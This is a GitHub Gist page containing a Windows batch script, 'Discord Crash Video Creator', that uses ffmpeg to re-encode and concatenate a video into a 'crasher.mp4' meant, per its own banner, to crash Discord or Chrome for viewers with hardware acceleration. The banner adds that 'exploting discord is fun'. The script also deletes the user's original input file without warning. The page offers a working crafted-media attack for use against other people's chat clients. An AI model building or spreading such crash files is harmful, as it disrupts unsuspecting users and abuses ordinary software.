-
-
Save Incognito-100/83e188f3160a5afcd49743e35c7c9d2b to your computer and use it in GitHub Desktop.
Discord Crash Video Creator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
title Discord Crash Video Creator | |
color c | |
echo ========================= NOTE ========================= | |
echo This script creates videos that crash Discord/Chrome. | |
echo Hardware acceleration must be enabled for it to work. | |
echo exploting discord is fun | |
echo. | |
echo ======================================================== | |
echo. | |
pause | |
WHERE ffmpeg | |
IF %ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit | |
color 7 | |
cls | |
set /p filepath=Enter path to video file (or drag and drop the video here): | |
echo Changing video properties... | |
ffmpeg -i %filepath% -pix_fmt yuv422p Bunny2.mp4 | |
echo Creating output file... | |
ffmpeg -f concat -i test.txt -codec copy crasher.mp4 | |
del Bunny2.mp4 | |
del %filepath% | |
echo. | |
pause | |
@BKGstudios |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
plus i also donwload the ideo